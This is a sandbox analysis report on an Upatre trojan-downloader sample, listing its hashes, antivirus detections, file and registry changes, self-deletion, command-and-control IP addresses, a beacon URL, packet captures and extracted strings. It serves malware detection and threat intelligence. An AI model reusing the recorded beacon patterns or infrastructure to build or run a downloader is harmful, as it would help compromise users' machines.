Analysis Date2015-11-12 18:53:01
MD575918161c27dc0df4cd5e7b21e59e273
SHA1282879df383c8f5640ba8d70e1b548e601e79f54

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 67b977c76e66e407f72684728b586b24 sha1: 8b84ba6daa0f559156dfa2ea581f3c0160e05b1e size: 9216
Section.rdata md5: 7b620b753bc63de4eb52a8acc8cde182 sha1: 115c58a0b520b7c6ae9ac28a30c8ac9eb37c9f8f size: 4096
Section.data md5: 7c760dadf30970c18b345f0c0f5576e2 sha1: 3d3cfaa64e70ba3645718f45b0c08998a981e47a size: 2048
Section.rsrc md5: 0c8170ea7b4c94e1c1b95cedfcde57d3 sha1: 2e69da12aa65a1dd01f0c7c5a4c54707ffb12990 size: 18432
Timestamp2091-10-18 21:42:07
PackerMicrosoft Visual C 2.0
PEhashcbd99bd0ca40eabcb6b9b51970cef1ca69a7f27f
IMPhash1d0e22050bd5d9bb8fe615757289537b
AVCA (E-Trust Ino)No Virus
AVF-SecureTrojan.Upatre.Gen.3
AVDr. WebTrojan.Upatre.4447
AVClamAVNo Virus
AVArcabit (arcavir)Trojan.Upatre.Gen.3
AVBullGuardTrojan.Upatre.Gen.3
AVPadvishNo Virus
AVVirusBlokAda (vba32)TrojanDownloader.Upatre
AVCAT (quickheal)Trojan.Kadena.B4
AVTrend MicroTROJ_UPATRE.SMJP
AVKasperskyTrojan-Downloader.Win32.Upatre.fxd
AVZillya!No Virus
AVEmsisoftTrojan.Upatre.Gen.3
AVIkarusTrojan.VB.Crypt
AVFrisk (f-prot)No Virus
AVAuthentiumW32/Upatre.O.gen!Eldorado
AVMalwareBytesTrojan.Upatre.PDF
AVMicroWorld (escan)Trojan.Upatre.Gen.3
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Upatre.BL
AVK7Trojan ( 004c16241 )
AVBitDefenderTrojan.Upatre.Gen.3
AVFortinetW32/Waski.A!tr
AVSymantecDownloader.Upatre
AVGrisoft (avg)Generic_s.EOR
AVEset (nod32)Win32/Kryptik.DGNJ
AVAlwil (avast)Crypt-SAL [Trj]
AVAd-AwareTrojan.Upatre.Gen.3
AVTwisterNo Virus
AVAvira (antivir)TR/Crypt.Xpack.302409
AVMcafeeDownloader-FASG!75918161C27D
AVRisingTrojan.Win32.Kryptik.af

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\reachF846.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\reachviewerpdf.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\reachviewerpdf.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\reachviewerpdf.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\icanhazip[1].htm
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes FileC:\malware.exe
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS81.163.87.7
Winsock DNS176.106.121.140
Winsock DNS91.240.97.71
Winsock DNS176.106.122.31
Winsock DNS80.87.220.102
Winsock DNS81.7.109.65
Winsock DNS85.248.2.228
Winsock DNS188.123.54.111
Winsock DNSicanhazip.com

Network Details:

DNSicanhazip.com
Type: A
64.182.208.185
DNSicanhazip.com
Type: A
64.182.208.184
HTTP GEThttp://icanhazip.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1)
HTTP GEThttp://81.7.109.65:13415/MSI11B/COMPUTER-XXXXXX/0/51-SP3/0/
User-Agent: Mozilla/5.0 (Windows NT 6.1)
Flows TCP192.168.1.1:1031 ➝ 64.182.208.185:80
Flows TCP192.168.1.1:1032 ➝ 81.7.109.65:13415
Flows TCP192.168.1.1:1033 ➝ 80.87.220.102:443
Flows TCP192.168.1.1:1034 ➝ 80.87.220.102:443
Flows TCP192.168.1.1:1035 ➝ 80.87.220.102:443
Flows TCP192.168.1.1:1036 ➝ 80.87.220.102:443
Flows TCP192.168.1.1:1037 ➝ 91.240.97.71:443
Flows TCP192.168.1.1:1038 ➝ 91.240.97.71:443
Flows TCP192.168.1.1:1039 ➝ 91.240.97.71:443
Flows TCP192.168.1.1:1040 ➝ 91.240.97.71:443
Flows TCP192.168.1.1:1041 ➝ 176.106.121.140:443
Flows TCP192.168.1.1:1042 ➝ 176.106.121.140:443
Flows TCP192.168.1.1:1043 ➝ 176.106.121.140:443
Flows TCP192.168.1.1:1044 ➝ 176.106.121.140:443
Flows TCP192.168.1.1:1045 ➝ 81.163.87.7:443
Flows TCP192.168.1.1:1046 ➝ 81.163.87.7:443
Flows TCP192.168.1.1:1047 ➝ 81.163.87.7:443
Flows TCP192.168.1.1:1048 ➝ 81.163.87.7:443
Flows TCP192.168.1.1:1049 ➝ 188.123.54.111:443
Flows TCP192.168.1.1:1050 ➝ 188.123.54.111:443
Flows TCP192.168.1.1:1051 ➝ 188.123.54.111:443
Flows TCP192.168.1.1:1052 ➝ 188.123.54.111:443
Flows TCP192.168.1.1:1053 ➝ 176.106.122.31:443
Flows TCP192.168.1.1:1054 ➝ 176.106.122.31:443
Flows TCP192.168.1.1:1055 ➝ 176.106.122.31:443
Flows TCP192.168.1.1:1056 ➝ 176.106.122.31:443
Flows TCP192.168.1.1:1057 ➝ 85.248.2.228:443
Flows TCP192.168.1.1:1058 ➝ 85.248.2.228:443

Raw Pcap
0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   41636365 70743a20 74657874 2f2a2c20   Accept: text/*, 
0x00000020 (00032)   6170706c 69636174 696f6e2f 2a0d0a55   application/*..U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000040 (00064)   6c612f35 2e302028 57696e64 6f777320   la/5.0 (Windows 
0x00000050 (00080)   4e542036 2e31290d 0a486f73 743a2069   NT 6.1)..Host: i
0x00000060 (00096)   63616e68 617a6970 2e636f6d 0d0a4361   canhazip.com..Ca
0x00000070 (00112)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x00000080 (00128)   63616368 650d0a0d 0a                  cache....

0x00000000 (00000)   47455420 2f4d5349 3131422f 434f4d50   GET /MSI11B/COMP
0x00000010 (00016)   55544552 2d585858 5858582f 302f3531   UTER-XXXXXX/0/51
0x00000020 (00032)   2d535033 2f302f20 48545450 2f312e31   -SP3/0/ HTTP/1.1
0x00000030 (00048)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000040 (00064)   7a696c6c 612f352e 30202857 696e646f   zilla/5.0 (Windo
0x00000050 (00080)   7773204e 5420362e 31290d0a 486f7374   ws NT 6.1)..Host
0x00000060 (00096)   3a203831 2e372e31 30392e36 353a3133   : 81.7.109.65:13
0x00000070 (00112)   3431350d 0a436163 68652d43 6f6e7472   415..Cache-Contr
0x00000080 (00128)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000090 (00144)                                         

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.


Strings

Close
Download
jjjh
MyBestClassex
RadionSpectrumApplication
Save
Update
Upload
"""""""
"""#"""
""$"$""
)#!$	$/-
0+{BJ8
+0%G3&J:8 
0h,EE@E
0j@E,hh0j,
13I#A4/
-1%BAI$
@2';)+:
2"!,##
2J@87=
2.K'4:
5-=	+/
5G+2,D
(:69 ?LH#@
!7?3*E5%?.
 7#F&#!
#7H$K4
8,$8AI
@$9I,5 $M<B3
a~CI:&
_acmdln_dll
AhJ*Cw
B"+-+	
^b{*36
"""BB""
""$BD""
BestMainClass
BestMyApplication
BhCIJs
button
Bx{*2,
:	C6.?H
C71=C	?
CbI^8.
CeXO=+
ciMN=+
CloseHandle
}cMN7+
CoAZ,B
_commode_dll
CreateFileA
CreateWindowExA
CRTDLL.dll
@.data
d,"{B>
"""DB""
DefWindowProcA
DialogBoxParamA
DispatchMessageA
E,@@000@
,E0E00
,,,E0@@E,0EE,
E0,j@0
,E@,E0
EE,E00@
@E@Ej0
eeOA8-
E,h,@EEh
,,,E@h,hhE0Ej
EhjjEEj
E_I^42
EiO^{.
@@,@Ej0
E@@jE@0EEj
EjE@h,j
EndDialog
_fmode_dll
G<8L7@5
.G9?K9
<)G/B1
GetClientRect
GetCurrentDirectoryA
GetLastError
__GetMainArgs
GetMessageA
GetModuleHandleA
GetStartupInfoA
_global_unwind2
h0E@j@
H0#?<@	@<F'
h0@h,EjhE
@,,@h@E
hj00,jj@0,jj@
hj@0@j
hjhE,,h0E
IeXz	-
_initterm
@,@j@00
j,0h0,
j@@@0jE
J166	;4
J%-80?
,jE,,0,EEE
jE,@@h
jh@@@E
,jhEhjE
j,h,h,
,j,j,h
jjh@Ejj
j@jhjEh0,
K4$,L5JD09
KERNEL32.dll
=K!	G:&JA@
.K$jf5<J
L. '7AL&E8
'LM30%
LoadAcceleratorsA
LoadCursorA
LoadIconA
LoadLibraryA
LoadLibraryW
LoadStringA
_local_unwind2
"M D?===2D98"*
Megator
PathCompactPathExA
PathFileExistsA
PathFindExtensionA
PathFindFileNameA
PathIsDirectoryA
PathMatchSpecA
PostQuitMessage
PvEZU!
qd,:{B
`.rdata
ReadFile
RegisterClassExA
riched32.DLL
richedit
RyXO,B
SendMessageA
SHLWAPI.dll
ShowWindow
static
!This program cannot be run in DOS mode.
TranslateAcceleratorA
TranslateMessage
TxzO	1
UpdateWindow
USER32.dll
VC20XC00U
we@O,B
Wi^*z)
xbXO	,
_XcptFilter
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security>    <requestedPrivileges>     <requestedExecutionLevel  level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo></assembly>